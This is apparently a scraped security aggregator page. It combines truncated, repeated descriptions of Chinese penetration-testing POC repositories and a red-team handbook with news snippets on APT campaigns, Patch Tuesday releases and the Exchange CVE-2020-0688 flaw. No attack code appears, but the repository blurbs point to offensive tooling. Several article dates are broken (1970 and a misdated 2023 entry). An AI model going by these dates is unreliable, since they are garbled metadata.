Middleware-Vulnerability-detection 2020418项目迎来两位伙伴一起维护 @caizhuang @3ND Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache Solr via Velocity template RCE --20203 CVE-2019-17564 Apache Dubbo反序列化漏洞 --20207 CVE-2020-13925 Apache Kylin 远程命令执行

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ASP ASPNET ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS Classic ASP CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Obj

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

公开收集所用

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

信息收集 主机信息收集 敏感目录文件收集 目录爆破 字典 BurpSuite 搜索引擎语法 Google Hack DuckDuckgo 可搜索微博、人人网等屏蔽了主流搜索引擎的网站 Bing js文件泄漏后台或接口信息 快捷搜索第三方资源 findjs robotstxt 目录可访问( autoindex ) iis短文件名 IIS-ShortName-Scanner

Recent Articles

Microsoft Patch Tuesday – February 2020
Symantec Threat Intelligence Blog • Preethi Koroth • 12 Feb 2023

This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

Posted: 12 Feb, 202024 Min ReadThreat Intelligence SubscribeMicrosoft Patch Tuesday – February 2020This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

As always, customers are advised to follow these security best practices:


Install vendor patches as soon as they are available.
Run all so...

APT41 Spies Broke Into 6 US State Networks via a Livestock App
Threatpost • Lisa Vaas • 09 Mar 2022

USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...

US Military Ties Prolific MuddyWater Cyberespionage APT to Iran
Threatpost • Lisa Vaas • 13 Jan 2022

U.S. Cyber Command has confirmed that MuddyWater – an advanced persistent threat (APT) cyberespionage actor aka Mercury, Static Kitten, TEMP.Zagros or Seedworm that’s historically targeted government victims in the Middle East – is an Iranian intelligence outfit.
The link has been suspected, and now it’s government-stamped. On Wednesday, USCYBERCOM not only confirmed the tie; it also disclosed the plethora of open-source tools and strategies MuddyWater uses to break into target sys...

Top CVEs Trending with Cybercriminals
Threatpost • Becky Bracken • 16 Jul 2021

Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.
An analysis of such chatter, by Cognyte, examined 15 cybercrime forums between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.
“Our findings reveal...

Widespread Brute-Force Attacks Tied to Russia’s APT28
Threatpost • Lisa Vaas • 02 Jul 2021

U.S. and U.K. authorities are warning that the APT28 advanced-threat actor (APT) – a.k.a. Fancy Bear or Strontium, among other names – has been using a Kubernetes cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.
The joint alert (PDF) – posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.’s National Cybe...

Android banking malware sharply increased in the first chunk of 2021, reckons ESET
The Register • Gareth Corfield • 04 Jun 2021

Claims Russia's FSB was poking around an Eastern European ministry

While enterprises stagger under sustained ransomware attacks, Android users are increasingly being targeted by banking malware, with Slovakian infosec firm ESET reckoning it had seen a 159 per cent increase in such malicious software over the last few months.
Even though banking malware aimed at users of the Google mobile OS sharply increased in popularity overall mobile threat detections on the Google-owned operating system declined by 18.8 per cent quarter-on-quarter, said ESET.
...

US think tank breached three times in a row by SolarWinds hackers
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable to quickly switch to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

Nation-state hackers breached US think tank thrice in a row
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable to quickly switch to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks
Threatpost • Tara Seals • 21 Oct 2020

Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities – with a Pulse VPN flaw claiming the dubious title of “most-favored bug” for these groups.
That’s according to the National Security Agency (NSA), which released a “top 25” list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of Cactus Pete, TA413, Vicious Panda and Winniti.
The Feds...

Microsoft Exchange Servers Still Open to Actively Exploited Flaw
Threatpost • Lindsey O'Donnell • 30 Sep 2020

Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges – even eight months after Microsoft issued a fix.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft’s February Patc...

Over 247K Exchange servers unpatched for actively exploited flaw
BleepingComputer • Sergiu Gatlan • 29 Sep 2020

More than 247,000 Microsoft Exchange servers are yet to be patched against the CVE-2020-0688 post-auth remote code execution (RCE) vulnerability impacting all Exchange Server versions under support.
The CVE-2020-0688 RCE flaw exists in the Exchange Control Panel (ECP) component — enabled in default configurations — and it enables potential attackers to remotely take over vulnerable Exchange servers using any valid email credentials.
Microsoft addressed the security issue as part ...

Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs
Threatpost • Lindsey O'Donnell • 14 Sep 2020

The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.
Patches are currently available for all these flaws – and in some cases, have been available for over a year – however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the...

What do F5, Citrix, Pulse Secure all have in common? China exploiting their flaws to hack govt, biz – Feds
The Register • Shaun Nichols in San Francisco • 14 Sep 2020

Beijing's snoops don't even need zero-days to break into valuable networks

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses.
Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted.
In a joint statement, the FBI and Homeland Security's Cybersecu...

Microsoft’s Patch Tuesday Packed with Critical RCE Bugs
Threatpost • Tara Seals • 08 Sep 2020

Microsoft has released patches for 129 security bugs in its September Patch Tuesday update. These include 23 critical flaws, 105 that are important in severity and one moderate bug. Fortunately, none are publicly known or under active exploitation, Microsoft said.
The most severe issue in the bunch is CVE-2020-16875, according to researchers. This is a memory-corruption problem in Microsoft Exchange that allows remote code-execution (RCE) just by sending an email to a target. Running arbit...

Enjoyed the US Labor Day weekend? Because it's September 2020 and Exchange Server can be pwned via email
The Register • Shaun Nichols in San Francisco • 08 Sep 2020

Don't be so smug, Mac users, you're open to an InDesign project file

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others.
September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate.
None of the bugs have public exploit code or in-the-wild attacks yet.
Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says ...

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment,...

Microsoft: Attackers increasingly exploit Exchange servers
BleepingComputer • Sergiu Gatlan • 24 Jun 2020

Microsoft's Defender ATP Research Team today issued guidance on how to defend against attacks targeting Exchange servers by blocking malicious activity identified with the help of behavior-based detection.
The Microsoft researchers based their analysis on multiple campaigns of Exchange attacks investigated during early April which showed how the malicious actors deploying web shells on on-premises Exchange servers.
Multiple fileless techniques were also used as part of these attacks,...

Serious Exchange Flaw Still Plagues 350K Servers
Threatpost • Lindsey O'Donnell • 07 Apr 2020

Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability – nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, opens servers up to authenticated attacker...

80% of all exposed Exchange servers still unpatched for critical flaw
BleepingComputer • Sergiu Gatlan • 06 Apr 2020

Over 350,000 of all Microsoft Exchange servers currently exposed on the Internet haven't yet been patched against the CVE-2020-0688 post-auth remote code execution vulnerability affecting all supported Microsoft Exchange Server versions.
This security flaw is present in the Exchange Control Panel (ECP) component —on by default— and it allows attackers to take over vulnerable Microsoft Exchange servers using any previously stolen valid email credentials.
Microsoft patched th...

Microsoft Exchange Server Flaw Exploited in APT Attacks
Threatpost • Lindsey O'Donnell • 09 Mar 2020

Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server, and was fixed as part of Microsoft’s February Patch Tuesday updates. However, researchers in a Friday advisory said that unpatched ser...

NSA Warns About Microsoft Exchange Flaw as Attacks Start
BleepingComputer • Sergiu Gatlan • 09 Mar 2020

The U.S. National Security Agency (NSA) warned about a post-auth remote code execution vulnerability in all supported Microsoft Exchange Server servers via a tweet published on the agency's Twitter account.
NSA's tweet
followers to patch the CVE-2020-0688 vulnerability which would enable potential attackers to execute commands on vulnerable Microsoft Exchange servers using email credentials.
Microsoft patched this RCE security flaw as part of the 
and tagged it wi...

Hackers Scanning for Vulnerable Microsoft Exchange Servers, Patch Now!
BleepingComputer • Sergiu Gatlan • 26 Feb 2020

Attackers are actively scanning the Internet for Microsoft Exchange Servers vulnerable to the CVE-2020-0688 remote code execution vulnerability
two weeks ago.
All Exchange Server versions up to the last released patch are exposed to potential attacks following these ongoing scans, including those currently out of support even though
doesn't explicitly list them.
The flaw is present in the Exchange Control Panel (ECP) component and it is caused by Exchange's inability ...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday.
Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities.
These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typic...

Microsoft Addresses Active Attacks, Air-Gap Danger with 99 Patches
Threatpost • Tara Seals • 11 Feb 2020

Microsoft has issued one of its largest Patch Tuesday updates for the shortest month of the year, addressing 99 security vulnerabilities across a range of products. Twelve of the bugs are listed as critical – and the rest are rated as being important.
The update includes a patch for the zero-day memory-corruption vulnerability disclosed in late January that’s under active attack. The bug tracked as CVE-2020-0674 is a critical flaw for most Internet Explorer versions, allowing remote co...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday.
Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities.
These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typic...

The Register

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses.
Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted.
In a joint statement, the FBI and Homeland Security's Cybersecu...

US govt: China-sponsored hackers targeting Exchange, Citrix, F5 flaws
BleepingComputer • Lawrence Abrams • 01 Jan 1970

Today, the US government issued an advisory on China-sponsored hackers attacking government agencies through vulnerabilities in Microsoft Exchange, Citrix, Pulse, and F5 devices and servers.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is an independent federal agency that protects against and coordinates responses to threats from private and state-sponsored hackers targeting United States interests.
In a new advisory today, CISA and the FBI warn that Chinese MSS-...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...

The Register

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others.
September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate.
None of the bugs have public exploit code or in-the-wild attacks yet.
Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says ...